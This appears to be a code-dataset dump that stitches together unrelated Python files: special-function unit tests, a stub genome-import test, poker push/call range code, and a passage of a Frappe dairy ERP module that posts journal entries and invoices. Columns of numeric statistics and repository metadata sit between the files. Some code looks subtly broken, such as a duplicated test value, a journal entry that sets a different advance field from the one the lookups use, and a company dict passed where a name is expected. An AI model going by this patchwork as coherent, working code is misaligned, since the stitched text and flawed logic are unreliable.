    expected = [special.gamma(x) for x in xs]
    # scalar calls
    npt.assert_almost_equal([sf.gamma(x) for x in xs], expected, decimal=5)
    # 1-D array call
    npt.assert_almost_equal(sf.gamma(np.asarray(xs)), expected, decimal=5)
    # 2-D array call; compare the single row
    out2d = sf.gamma(np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=5)
def test_gammaln():
    """Check sf.gammaln against scipy.special.gammaln for scalar, 1-D and 2-D input."""
    xs = [0.0, 0.53, 1.0, 5.67, 10.0]
    expected = [special.gammaln(x) for x in xs]
    # scalar calls
    npt.assert_almost_equal([sf.gammaln(x) for x in xs], expected, decimal=5)
    # 1-D array call
    npt.assert_almost_equal(sf.gammaln(np.asarray(xs)), expected, decimal=5)
    # 2-D array call; compare the single row
    out2d = sf.gammaln(np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=5)
def test_gammap():
    """Check sf.gammap against scipy.special.gammainc (lower incomplete gamma)."""
    xs = [0, 1, 10, 100]
    expected = [special.gammainc(1.0, x) for x in xs]
    # scalar calls with shape parameter a = 1.0
    npt.assert_almost_equal([sf.gammap(1.0, x) for x in xs], expected, decimal=5)
    # 1-D array call (shape parameter supplied as a vector of ones)
    npt.assert_almost_equal(sf.gammap(np.ones(4), np.asarray(xs)), expected, decimal=5)
    # 2-D array call; compare the single row
    out2d = sf.gammap(np.ones(4).reshape(1, -1), np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=5)
def test_gammaq():
    """Check sf.gammaq against scipy.special.gammaincc (upper incomplete gamma)."""
    xs = [0, 0.1, 0.5, 1]
    expected = [special.gammaincc(1.0, x) for x in xs]
    # scalar calls with shape parameter a = 1.0
    npt.assert_almost_equal([sf.gammaq(1.0, x) for x in xs], expected, decimal=5)
    # 1-D array call (shape parameter supplied as a vector of ones)
    npt.assert_almost_equal(sf.gammaq(np.ones(4), np.asarray(xs)), expected, decimal=5)
    # 2-D array call; compare the single row
    out2d = sf.gammaq(np.ones(4).reshape(1, -1), np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=5)
################################################################################
# Error Function
def test_erf():
    """Check sf.erf against scipy.special.erf for scalar, 1-D and 2-D input."""
    # NOTE(review): 5 appears twice and -5 never; possibly a typo in the
    # original fixture — kept as-is to preserve behavior.
    xs = [-10, 5, 0, 5, 10]
    expected = [special.erf(x) for x in xs]
    # scalar calls
    npt.assert_almost_equal([sf.erf(x) for x in xs], expected, decimal=3)
    # 1-D array call
    npt.assert_almost_equal(sf.erf(np.asarray(xs)), expected, decimal=3)
    # 2-D array call; compare the single row
    out2d = sf.erf(np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=3)
def test_erfc():
    """Check sf.erfc against scipy.special.erfc for scalar, 1-D and 2-D input."""
    xs = [-10, 5, 0, 5, 10]
    expected = [special.erfc(x) for x in xs]
    # scalar calls
    npt.assert_almost_equal([sf.erfc(x) for x in xs], expected, decimal=3)
    # 1-D array call
    npt.assert_almost_equal(sf.erfc(np.asarray(xs)), expected, decimal=3)
    # 2-D array call; compare the single row
    out2d = sf.erfc(np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=3)
def test_erfcc():
    """Check the fast approximation sf.erfcc against scipy.special.erfc.

    Only a coarse tolerance (decimal=-1) — erfcc is an approximation.
    """
    xs = [-10, 5, 0, 5, 10]
    expected = [special.erfc(x) for x in xs]
    # scalar calls
    npt.assert_almost_equal([sf.erfcc(x) for x in xs], expected, decimal=-1)
    # 1-D array call
    npt.assert_almost_equal(sf.erfcc(np.asarray(xs)), expected, decimal=-1)
    # 2-D array call; compare the single row
    out2d = sf.erfcc(np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=-1)
def test_inverfc():
    """Check sf.inverfc against scipy.special.erfcinv for scalar, 1-D and 2-D input."""
    xs = [0.1, 0.3, 0.5, 0.6, 1.0]
    expected = [special.erfcinv(x) for x in xs]
    # scalar calls
    npt.assert_almost_equal([sf.inverfc(x) for x in xs], expected, decimal=3)
    # 1-D array call
    npt.assert_almost_equal(sf.inverfc(np.asarray(xs)), expected, decimal=3)
    # 2-D array call; compare the single row
    out2d = sf.inverfc(np.asarray([xs]))
    npt.assert_almost_equal(out2d[0, :], expected, decimal=3)
################################################################################
| 30.227941
| 81
| 0.559231
| 696
| 4,111
| 3.221264
| 0.074713
| 0.024978
| 0.160571
| 0.214095
| 0.821142
| 0.810437
| 0.804193
| 0.804193
| 0.804193
| 0.772971
| 0
| 0.113424
| 0.193627
| 4,111
| 135
| 82
| 30.451852
| 0.562896
| 0.019703
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.347826
| 1
| 0.115942
| false
| 0
| 0.072464
| 0
| 0.188406
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9046ed3759847debf179da2f2ee5ab16f055ff0
| 216
|
py
|
Python
|
src/modelseed/test/test_import_genome.py
|
jayrbolton/arangodb_biochem_importer
|
b1c3eb16908ce47bf4c0b2ed792262612b6a019b
|
[
"MIT"
] | null | null | null |
src/modelseed/test/test_import_genome.py
|
jayrbolton/arangodb_biochem_importer
|
b1c3eb16908ce47bf4c0b2ed792262612b6a019b
|
[
"MIT"
] | 17
|
2019-07-15T16:55:22.000Z
|
2021-11-02T18:49:56.000Z
|
src/modelseed/test/test_import_genome.py
|
jayrbolton/arangodb_biochem_importer
|
b1c3eb16908ce47bf4c0b2ed792262612b6a019b
|
[
"MIT"
] | 6
|
2019-08-05T17:02:22.000Z
|
2021-05-13T15:52:11.000Z
|
import unittest
# from arangodb_biochem_importer.import_genome import import_genome
class TestImportGenome(unittest.TestCase):
    """Smoke-test scaffold for the genome importer (import currently disabled)."""

    def test_basic_download(self):
        # Placeholder until the importer can run here:
        # import_genome('32952/30/1')
        pass
| 21.6
| 67
| 0.75463
| 26
| 216
| 6
| 0.730769
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044693
| 0.171296
| 216
| 9
| 68
| 24
| 0.826816
| 0.430556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f913ecb6b8966bffbd0f7c27e7c9d079325ccaaa
| 5,443
|
py
|
Python
|
sample_player/tools/metrics.py
|
benoitRodde/DeepPoker
|
1f5336246324d97bb915373b1a05f30be38c5126
|
[
"MIT"
] | null | null | null |
sample_player/tools/metrics.py
|
benoitRodde/DeepPoker
|
1f5336246324d97bb915373b1a05f30be38c5126
|
[
"MIT"
] | 8
|
2020-04-24T08:11:54.000Z
|
2022-02-10T01:21:56.000Z
|
sample_player/tools/metrics.py
|
benoitRodde/DeepPoker
|
1f5336246324d97bb915373b1a05f30be38c5126
|
[
"MIT"
] | 1
|
2020-08-27T15:44:25.000Z
|
2020-08-27T15:44:25.000Z
|
import numpy as np
def compute_nash_pusher(model):
    """Compute the push range (in big blinds) for the small-blind pusher.

    For each starting-hand class, the model is queried at decreasing stack
    sizes (20bb down in 0.1bb steps) until it first predicts a push; that
    stack size is recorded in a 13x13 matrix: pocket pairs on the diagonal,
    suited hands in the upper triangle, offsuit hands in the lower triangle.
    A cell stays 0 when the model never pushes before the stack drops
    below 1bb.

    The model must expose `predict(feat)` for a (1, 16) feature row:
    13 one-hot card ranks, suited flag, small-blind flag, normalized stack.
    """
    sb = 1  # acting as the small blind (the pusher)

    def _push_threshold(cards, suited):
        # Largest stack (<= 20bb, 0.1bb grid) at which the model predicts
        # a push, or None if it never pushes before the stack reaches 1bb.
        stack = 20
        while True:
            feat = np.concatenate(
                [cards, np.array([suited, sb, stack * 20 / 400])]).reshape((1, 16))
            if np.argmax(model.predict(feat)) != 0:
                return stack
            stack -= 0.1
            if stack < 1:
                return None

    def _one_hot(*ranks):
        # One-hot encode ranks (0 = highest) into a length-13 vector.
        cards = np.zeros(13)
        for r in ranks:
            cards[12 - r] = 1
        return cards

    matrix = np.zeros((13, 13))
    print("computing pusher ranges")
    print("\tpocket pairs")
    # pocket pairs -> diagonal
    for i in range(13):
        t = _push_threshold(_one_hot(i), 0)
        if t is not None:
            matrix[i][i] = t
    # suited hands -> upper triangle (row = higher-ranked index)
    for i in range(13):
        for j in range(13):
            if j != i:
                t = _push_threshold(_one_hot(i, j), 1)
                if t is not None:
                    matrix[min(i, j)][max(i, j)] = t
    # offsuit hands -> lower triangle
    for i in range(13):
        for j in range(13):
            if j != i:
                t = _push_threshold(_one_hot(i, j), 0)
                if t is not None:
                    matrix[max(i, j)][min(i, j)] = t
    return matrix
def compute_nash_caller(model):
    """Compute the call range (in big blinds) for the big-blind caller.

    Identical procedure to compute_nash_pusher but with the small-blind
    flag set to 0: for each starting-hand class the model is queried at
    decreasing stack sizes (20bb down in 0.1bb steps) until it first
    predicts a call; that stack size fills a 13x13 matrix (pairs on the
    diagonal, suited above, offsuit below; 0 when it never calls above 1bb).

    The model must expose `predict(feat)` for a (1, 16) feature row:
    13 one-hot card ranks, suited flag, small-blind flag, normalized stack.
    """
    sb = 0  # acting as the big blind (the caller)

    def _call_threshold(cards, suited):
        # Largest stack (<= 20bb, 0.1bb grid) at which the model predicts
        # a call, or None if it never calls before the stack reaches 1bb.
        stack = 20
        while True:
            feat = np.concatenate(
                [cards, np.array([suited, sb, stack * 20 / 400])]).reshape((1, 16))
            if np.argmax(model.predict(feat)) != 0:
                return stack
            stack -= 0.1
            if stack < 1:
                return None

    def _one_hot(*ranks):
        # One-hot encode ranks (0 = highest) into a length-13 vector.
        cards = np.zeros(13)
        for r in ranks:
            cards[12 - r] = 1
        return cards

    matrix = np.zeros((13, 13))
    print("computing caller ranges")
    print("\tpocket pairs")
    # pocket pairs -> diagonal
    for i in range(13):
        t = _call_threshold(_one_hot(i), 0)
        if t is not None:
            matrix[i][i] = t
    # suited hands -> upper triangle (row = higher-ranked index)
    for i in range(13):
        for j in range(13):
            if j != i:
                t = _call_threshold(_one_hot(i, j), 1)
                if t is not None:
                    matrix[min(i, j)][max(i, j)] = t
    # offsuit hands -> lower triangle
    for i in range(13):
        for j in range(13):
            if j != i:
                t = _call_threshold(_one_hot(i, j), 0)
                if t is not None:
                    matrix[max(i, j)][min(i, j)] = t
    return matrix
| 32.39881
| 99
| 0.393717
| 582
| 5,443
| 3.558419
| 0.085911
| 0.213423
| 0.246258
| 0.098503
| 0.967648
| 0.967648
| 0.967648
| 0.967648
| 0.932883
| 0.932883
| 0
| 0.069671
| 0.51479
| 5,443
| 167
| 100
| 32.592814
| 0.714502
| 0.022598
| 0
| 0.965035
| 0
| 0
| 0.013939
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013986
| false
| 0
| 0.006993
| 0
| 0.034965
| 0.027972
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
00645eec836dff286a9c1c4cc052a6baa4e7e18c
| 37,062
|
py
|
Python
|
dairy_erp/dairy_erp/doctype/vlcc_payment_cycle_report/vlcc_payment_cycle_report.py
|
shrikant9867/Dairy_project_Daiyerp
|
635d34115f0eb2081b6835a190eda4971dbfb99f
|
[
"MIT"
] | null | null | null |
dairy_erp/dairy_erp/doctype/vlcc_payment_cycle_report/vlcc_payment_cycle_report.py
|
shrikant9867/Dairy_project_Daiyerp
|
635d34115f0eb2081b6835a190eda4971dbfb99f
|
[
"MIT"
] | null | null | null |
dairy_erp/dairy_erp/doctype/vlcc_payment_cycle_report/vlcc_payment_cycle_report.py
|
shrikant9867/Dairy_project_Daiyerp
|
635d34115f0eb2081b6835a190eda4971dbfb99f
|
[
"MIT"
] | 2
|
2020-01-19T13:27:57.000Z
|
2021-12-28T20:32:56.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Stellapps Technologies Private Ltd.
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.utils import getdate
from dairy_erp.dairy_utils import make_dairy_log
from frappe import _
from frappe.utils import flt, cstr,nowdate,cint
import json
class VLCCPaymentCycleReport(Document):
def validate(self):
    """Block duplicate VPCRs per (cycle, VLCC) and generation before cycle end."""
    # only one vpcr allowed against one vlcc per cycle
    if frappe.db.get_value("VLCC Payment Cycle Report",{'cycle':self.cycle,\
        'vlcc_name':self.vlcc_name},'name') and self.is_new():
        frappe.throw(_("VPCR has already been generated for this cycle against vlcc <b>{0}</b>".format(self.vlcc_name)))
    # the report can only be generated after the collection period has ended
    if self.collection_to >= nowdate() :
        frappe.throw(_("You can generate VPCR after <b>'{0}'</b>".format(self.collection_to)))
def before_submit(self):
    """Run the cycle's advance/loan bookkeeping, then create the incentive
    Purchase Invoice once per (cycle, VLCC). Rolls back and logs to Dairy
    Log on any failure, re-raising as a user-facing error.
    """
    try:
        self.advance_operation()
        self.loan_operation()
        self.update_vpcr()
        if float(self.incentives) != 0:
            # create the incentive invoice only once per cycle and supplier
            if not frappe.db.get_value("Purchase Invoice", {'cycle': self.cycle,\
                'supplier': self.vlcc_name},'name'):
                self.create_incentive()
                frappe.msgprint(_("Purchase invoice created successfully against Incentives"))
            else: frappe.msgprint(_("Purchase invoice Already created successfully against Incentives"))
    except Exception,e:  # NOTE: Python 2 except syntax — this codebase targets py2
        frappe.db.rollback()
        make_dairy_log(title="JV creation Against Advance Failed",method="make_jv", status="Error",
            data = "data", message=e, traceback=frappe.get_traceback())
        frappe.throw("Something Went Wrong Please check dairy log")
def update_vpcr(self):
    """Recompute outstanding figures: total principle of the child rows minus
    the total debit already journaled against this VLCC for loans/advances."""
    loan_total, loan_je, adavnce_je, advance_total = 0, 0, 0, 0
    for row in self.vlcc_loan_child:
        company = frappe.db.get_value("Company",{'is_dairy':1},'name',as_dict=1)  # NOTE(review): fetched but unused in this loop
        je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
            ,filters={'vlcc_advance':row.loan_id,'type':'Vlcc Loan', 'company': self.vlcc_name})
        loan_je += je_amt[0].get('amt')
        loan_total += row.principle
    for row in self.vlcc_advance_child:
        company = frappe.db.get_value("Company",{'is_dairy':1},'name',as_dict=1)  # NOTE(review): fetched but unused in this loop
        je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
            ,filters={'vlcc_advance':row.adv_id,'type':'Vlcc Advance', 'company': self.vlcc_name})
        adavnce_je += je_amt[0].get('amt')
        advance_total += row.principle
    # outstanding = principle not yet recovered through journal entries
    self.advance_outstanding = float(advance_total) - float(adavnce_je)
    self.loan_outstanding = float(loan_total) - float(loan_je)
def advance_operation(self):
    """For every advance row: create the dairy-side and VLCC-side journal
    entries on first run, or update the existing ones on re-run."""
    flag = False  # True once at least one advance row was processed
    for row in self.vlcc_advance_child:
        flag = True
        company = frappe.db.get_value("Company",{'is_dairy':1},'name')
        # existing JEs for this advance/cycle on the dairy and VLCC books
        dairy_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
            'vlcc_advance':row.adv_id,'type':'Vlcc Advance', 'company': company }, 'name')
        vlcc_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
            'vlcc_advance':row.adv_id,'type':'Vlcc Advance', 'company': self.vlcc_name }, 'name' )
        if not dairy_je_exist:
            # first processing of this advance in this cycle
            self.validate_advance(row)
            dairy_je = self.create_dairy_advance_je(row)
            vlcc_je = self.create_vlcc_advance_je(row)
            self.update_advance_doc(row, dairy_je)
        elif dairy_je_exist:
            # JEs already created (re-submit): amend instead of recreating
            self.update_dairy_je_for_advance(row, self.cycle, dairy_je_exist)
            self.update_vlcc_je_for_advance(row, self.cycle, vlcc_je_exist)
            self.update_advance_after_vpcr(row)
    if flag:
        frappe.msgprint(_("Journal Entries have been created successfully against Advances"))
def loan_operation(self):
    """For every loan row: create the dairy-side and VLCC-side journal
    entries on first run, or update the existing ones on re-run."""
    flag = False  # True once at least one loan row was processed
    for row in self.vlcc_loan_child:
        flag = True
        company = frappe.db.get_value("Company",{'is_dairy':1},'name')
        # existing JEs for this loan/cycle on the dairy and VLCC books
        dairy_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
            'vlcc_advance':row.loan_id,'type':'Vlcc Loan', 'company': company }, 'name')
        vlcc_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
            'vlcc_advance':row.loan_id,'type':'Vlcc Loan', 'company': self.vlcc_name }, 'name' )
        if not dairy_je_exist:
            # first processing of this loan in this cycle
            self.validate_loan(row)
            dairy_je = self.create_dairy_loan_je(row)
            vlcc_je = self.create_vlcc_loan_je(row)
            self.update_loan_je(row, dairy_je)
        elif dairy_je_exist:
            # JEs already created (re-submit): amend instead of recreating
            self.update_dairy_je_for_loan(row, self.cycle, dairy_je_exist)
            self.update_vlcc_je_for_loan(row, self.cycle, vlcc_je_exist)
            self.update_loan_vpcr_je(row)
    if flag:
        frappe.msgprint(_("Journal Entries have been created successfully against Loans"))
def validate_advance(self, row):
    """Validate one advance row: amount present, not above outstanding, and the
    final instalment must match the EMI exactly or go through an extension."""
    adv_doc = frappe.get_doc("Vlcc Advance",row.adv_id)
    if not row.amount:
        frappe.throw(_("Please Enter amount against <b>{0}</b>".format(row.adv_id)))
    if float(row.amount) > float(row.outstanding):
        frappe.throw(_("Amount can not be greater than outstanding for <b>{0}</b>".format(row.adv_id)))
    # one instalment left but amount/outstanding doesn't line up with the EMI:
    # force the user to extend the advance instead of under-paying it
    if (int(row.no_of_instalment) + int(adv_doc.extension)) - row.paid_instalment == 1 and \
        (float(row.amount) < float(adv_doc.emi_amount) or float(row.outstanding) != float(adv_doc.emi_amount)):
        frappe.throw(_("Please Use Extension for <b>{0}</b>".format(row.adv_id)))
def validate_loan(self, row):
    """Validate one loan row: amount present, not above outstanding, and the
    final instalment must match the EMI exactly or go through an extension."""
    loan_doc = frappe.get_doc("Vlcc Loan",row.loan_id)
    if not row.amount:
        frappe.throw(_("Please Enter amount against <b>{0}</b>".format(row.loan_id)))
    if float(row.amount) > float(row.outstanding):
        frappe.throw(_("Amount can not be greater than outstanding for <b>{0}</b>".format(row.loan_id)))
    # one instalment left but amount/outstanding doesn't line up with the EMI.
    # NOTE(review): uses loan_doc.paid_instalment while validate_advance uses
    # row.paid_instalment — confirm which is intended.
    if (int(row.no_of_instalment) + int(loan_doc.extension)) - loan_doc.paid_instalment == 1 and \
        (float(row.amount) < float(loan_doc.emi_amount) or float(row.outstanding) != float(loan_doc.emi_amount)):
        frappe.throw(_("Please Use Extension <b>{0}</b>".format(row.loan_id)))
def create_si(self, row, type_, item, doc_id):
    """Create and submit a dairy->VLCC Sales Invoice for `row.amount`, then
    force the invoice's and its GL entries' posting date back to the cycle
    end date. Returns the new Sales Invoice name.
    """
    company = frappe.db.get_value("Company",{'is_dairy':1},'name')
    si_doc = frappe.new_doc("Sales Invoice")
    si_doc.type = type_
    si_doc.posting_date = self.collection_to
    si_doc.customer = self.vlcc_name
    si_doc.company = company
    si_doc.vlcc_advance_loan = doc_id
    si_doc.cycle_ = self.cycle
    si_doc.append("items",{
        "item_code": item,
        "qty": 1,
        "rate": row.amount,
        "cost_center": frappe.db.get_value("Company", company, "cost_center")
    })
    si_doc.flags.ignore_permissions = True
    si_doc.save()
    si_doc.submit()
    # presumably save/submit can shift posting_date, so it is forced back to
    # the cycle end on the invoice and both GL rows — TODO confirm
    frappe.db.set_value("Sales Invoice", si_doc.name, 'posting_date', self.collection_to)
    gl_stock = frappe.db.get_value("Company", company, 'default_income_account')
    gl_credit = frappe.db.get_value("Company", company, 'default_receivable_account')
    frappe.db.set_value("GL Entry", {"account": gl_stock, "voucher_no": si_doc.name},\
        'posting_date', self.collection_to )
    frappe.db.set_value("GL Entry", {"account": gl_credit, "voucher_no": si_doc.name},\
        'posting_date', self.collection_to )
    return si_doc.name
def create_dairy_advance_je(self, row):
    """Dairy-side JE for an advance recovery: debit Debtors (the VLCC as
    Customer), credit Loans and Advances. Returns the JE name."""
    company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
    je_doc = frappe.new_doc("Journal Entry")
    je_doc.voucher_type = "Journal Entry"
    je_doc.company = company.get('name')
    je_doc.type = "Vlcc Advance"
    je_doc.cycle = self.cycle
    je_doc.reference_party = self.vlcc_name
    je_doc.vlcc_advance = row.adv_id
    je_doc.reference_party = self.vlcc_name  # NOTE(review): duplicate assignment (already set above)
    je_doc.posting_date = nowdate()
    je_doc.append('accounts', {
        'account': "Debtors - "+ company.get('abbr'),
        'debit_in_account_currency': row.amount,
        'party_type': "Customer",
        'party': self.vlcc_name,
        'cost_center': company.get('cost_center')
    })
    je_doc.append('accounts', {
        'account': "Loans and Advances - "+ company.get('abbr'),
        'credit_in_account_currency': row.amount,
        'cost_center': company.get('cost_center')
    })
    je_doc.flags.ignore_permissions = True
    je_doc.save()
    je_doc.submit()
    return je_doc.name
def create_dairy_loan_je(self, row):
    """Dairy-side JE for a loan repayment split into principal + interest:
    debit Debtors for the full amount, credit Loans and Advances (principal)
    and Interest Income (interest). Back-dates the JE and its GL entries to
    the cycle end date. Returns the JE name.
    """
    company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
    # split row.amount into principal and interest portions
    principal_interest = get_interest_amount(row.amount, row.loan_id)
    je_doc = frappe.new_doc("Journal Entry")
    je_doc.voucher_type = "Journal Entry"
    je_doc.company = company.get('name')
    je_doc.reference_party = self.vlcc_name
    je_doc.type = "Vlcc Loan"
    je_doc.cycle = self.cycle
    je_doc.farmer_advance = row.loan_id  # NOTE(review): other loan JEs set vlcc_advance; lookups elsewhere filter on vlcc_advance — confirm
    je_doc.reference_party = self.vlcc_name  # NOTE(review): duplicate assignment (already set above)
    je_doc.posting_date = nowdate()
    je_doc.append('accounts', {
        'account': "Debtors - "+ company.get('abbr'),
        'party_type': "Customer",
        'party': self.vlcc_name,
        'debit_in_account_currency': principal_interest.get('principal') + principal_interest.get('interest'),
        'cost_center': company.get('cost_center')
    })
    je_doc.append('accounts', {
        'account': "Loans and Advances - "+ company.get('abbr'),
        'credit_in_account_currency': principal_interest.get('principal'),
        'cost_center': company.get('cost_center')
    })
    je_doc.append('accounts', {
        'account': "Interest Income - "+ company.get('abbr'),
        'credit_in_account_currency': principal_interest.get('interest'),
        'cost_center': company.get('cost_center')
    })
    je_doc.flags.ignore_permissions = True
    je_doc.save()
    je_doc.submit()
    # force the JE and its GL rows back to the cycle end date
    frappe.db.set_value("Journal Entry", je_doc.name, 'posting_date', self.collection_to)
    # NOTE(review): `company` is a dict here, not a name — these two lookups
    # likely need company.get('name'); their results are also unused below.
    gl_stock = frappe.db.get_value("Company", company, 'default_income_account')
    gl_credit = frappe.db.get_value("Company", company, 'default_receivable_account')
    frappe.db.set_value("GL Entry", {"account": "Debtors - "+ company.get('abbr'), "voucher_no": je_doc.name},\
        'posting_date', self.collection_to )
    frappe.db.set_value("GL Entry", {"account": "Loans and Advances - "+ company.get('abbr'), "voucher_no": je_doc.name},\
        'posting_date', self.collection_to )
    frappe.db.set_value("GL Entry", {"account": "Interest Income - "+ company.get('abbr'), "voucher_no": je_doc.name},\
        'posting_date', self.collection_to )
    return je_doc.name
def create_pi(self, row, type_, item, doc_id):
    """Create and submit a single-item Purchase Invoice in the VLCC's books.

    The dairy company is the supplier; the invoice is tagged with the PI
    type, cycle, and the originating advance/loan document id.
    """
    dairy_company = frappe.db.get_value("Company", {'is_dairy': 1}, 'name')
    invoice = frappe.new_doc("Purchase Invoice")
    invoice.supplier = dairy_company
    invoice.company = self.vlcc_name
    invoice.pi_type = type_
    invoice.cycle = self.cycle
    invoice.vlcc_advance_loan = doc_id
    invoice.append("items", {
        "item_code": item,
        "qty": 1,
        "rate": row.amount,
        "cost_center": frappe.db.get_value("Company", dairy_company, "cost_center"),
    })
    invoice.flags.ignore_permissions = True
    invoice.save()
    invoice.submit()
def create_vlcc_advance_je(self, row):
    """Create and submit the VLCC-side Journal Entry for an advance recovery.

    Debits Loans and Advances Payable and credits Creditors (supplier =
    the dairy company) for the recovered amount, in the VLCC's books.
    """
    dairy = frappe.db.get_value("Company", {'is_dairy': 1},
        ['name', 'abbr', 'cost_center'], as_dict=1)
    vlcc = frappe.db.get_value("Company", self.vlcc_name,
        ['abbr', 'cost_center'], as_dict=1)
    je = frappe.new_doc("Journal Entry")
    je.voucher_type = "Journal Entry"
    je.company = self.vlcc_name
    je.type = "Vlcc Advance"
    je.cycle = self.cycle
    je.reference_party = dairy.get('name')
    je.vlcc_advance = row.adv_id
    je.posting_date = nowdate()
    je.append('accounts', {
        'account': "Loans and Advances Payable - " + vlcc.get('abbr'),
        'debit_in_account_currency': row.amount,
        'cost_center': vlcc.get('cost_center'),
    })
    je.append('accounts', {
        'account': "Creditors - " + vlcc.get('abbr'),
        'credit_in_account_currency': row.amount,
        'party_type': "Supplier",
        'party': dairy.get('name'),
        'cost_center': vlcc.get('cost_center'),
    })
    je.flags.ignore_permissions = True
    je.save()
    je.submit()
def create_vlcc_loan_je(self, row):
    """Create and submit the VLCC-side Journal Entry for a loan recovery.

    Debits Loans and Advances Payable (principal) and Interest Expense
    (interest); credits Creditors (supplier = the dairy company) for the
    combined total.
    """
    dairy = frappe.db.get_value("Company", {'is_dairy': 1},
        ['name', 'abbr', 'cost_center'], as_dict=1)
    vlcc = frappe.db.get_value("Company", self.vlcc_name,
        ['abbr', 'cost_center'], as_dict=1)
    split = get_interest_amount(row.amount, row.loan_id)
    je = frappe.new_doc("Journal Entry")
    je.voucher_type = "Journal Entry"
    je.company = self.vlcc_name
    je.type = "Vlcc Loan"
    je.reference_party = dairy.get('name')
    je.cycle = self.cycle
    je.vlcc_advance = row.loan_id
    je.posting_date = nowdate()
    je.append('accounts', {
        'account': "Loans and Advances Payable - " + vlcc.get('abbr'),
        'debit_in_account_currency': split.get('principal'),
        'cost_center': vlcc.get('cost_center'),
    })
    je.append('accounts', {
        'account': "Interest Expense - " + vlcc.get('abbr'),
        'debit_in_account_currency': split.get('interest'),
        'cost_center': vlcc.get('cost_center'),
    })
    je.append('accounts', {
        'account': "Creditors - " + vlcc.get('abbr'),
        'credit_in_account_currency': split.get('principal') + split.get('interest'),
        'party_type': "Supplier",
        'party': dairy.get('name'),
        'cost_center': vlcc.get('cost_center'),
    })
    je.flags.ignore_permissions = True
    je.save()
    je.submit()
def update_dairy_je_for_advance(self, row, cycle, je_no):
    """Rewrite an already-submitted dairy advance JE to the new amount.

    Patches the Debtors (debit) and Loans and Advances (credit) child
    rows, the parent totals, and backdates the posting date; GL Entries
    are patched by update_gl_entry_dairy_advance.
    """
    dairy = frappe.db.get_value("Company", {'is_dairy': 1},
        ['name', 'abbr', 'cost_center'], as_dict=1)
    debtors_acc = 'Debtors - ' + dairy.get('abbr')
    advances_acc = 'Loans and Advances - ' + dairy.get('abbr')
    debit_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': debtors_acc}, 'name')
    credit_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': advances_acc}, 'name')
    # Patch the child rows directly (the JE is already submitted).
    frappe.db.set_value("Journal Entry Account",
        {'name': debit_row, 'account': debtors_acc},
        'debit_in_account_currency', row.amount)
    frappe.db.set_value("Journal Entry Account",
        {'name': credit_row, 'account': advances_acc},
        'credit_in_account_currency', row.amount)
    # Keep parent totals and posting date in sync.
    frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
    self.update_gl_entry_dairy_advance(je_no, row.amount)
def update_vlcc_je_for_advance(self, row, cycle, je_no):
    """Rewrite a submitted VLCC advance JE to the new amount.

    Patches the Loans and Advances Payable (debit) and Creditors (credit)
    child rows, the parent totals, and backdates the posting date; GL
    Entries are patched by update_gl_entry_vlcc_advance.
    """
    # Removed an unused dairy-company lookup present in the old version.
    vlcc_attr = frappe.db.get_value("Company", self.vlcc_name,
        ['abbr', 'cost_center'], as_dict=1)
    payable_acc = 'Loans and Advances Payable - ' + vlcc_attr.get('abbr')
    creditors_acc = 'Creditors - ' + vlcc_attr.get('abbr')
    debit_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': payable_acc}, 'name')
    credit_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': creditors_acc}, 'name')
    frappe.db.set_value("Journal Entry Account",
        {'name': debit_row, 'account': payable_acc},
        'debit_in_account_currency', row.amount)
    frappe.db.set_value("Journal Entry Account",
        {'name': credit_row, 'account': creditors_acc},
        'credit_in_account_currency', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
